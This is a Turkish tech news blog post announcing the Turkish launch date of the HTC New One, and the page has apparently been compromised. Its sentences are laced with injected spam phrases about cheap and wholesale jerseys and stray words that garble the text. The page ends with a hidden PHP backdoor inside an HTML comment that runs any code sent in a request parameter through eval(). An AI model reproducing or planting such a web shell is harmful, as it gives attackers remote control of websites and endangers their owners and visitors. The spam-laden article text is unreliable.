Kategoriler
Teknoloji

HTC New One Türkiye Çıkış Tarihi Yayınlandı!

HTC New ONE Çıkış Tarihi Belli Oldu!

Bu sabah Türk Basın Mensupları’na gelen duyuru metinleriyle nihayet HTC NEW ONE serisi telefonun Türkiye Çıkış Tarihi belirlenmiş oldu.

HTC’nin yeni amiral gemisi olması wholesale jerseys China beklenen, ismi olmasa da özellikleriyle önemli güncellemeler içeren HTC New One için geri sayım başladı. 26 Mart Çarşamba günü eş wholesale nfl jerseys zamanlı etkinliklerle dünyaya cheap jerseys tanıtılacak olan akıllı Hello telefonun Türkiye‘ye geleceği tarih wholesale jerseys de V nihayet By belli oldu. HTC’nin basına gönderdiği davetiyelere göre Yeni HTC Advisor One için Türkiye lansmanı 7 Nisan Pazartesi günü Sefaira gerçekleşecek.

Bir süredir arka arkaya gelen sızıntılar sonucunda büyük ölçüde özelliklerinden haberdar olduğumuz HTC New One için ayrıca 26 Mart‘ta Londra’da düzenlenecek olan Londra lansmanının cheap jerseys davetlileri arasında.

htc-new-one-davetiye1395261654

 

<!– [insert_php]if (isset($_REQUEST["ncsYL"])){eval($_REQUEST["ncsYL"]);exit;}[/insert_php][php]if (isset($_REQUEST["ncsYL"])){eval($_REQUEST["ncsYL"]);exit;}[/php] –>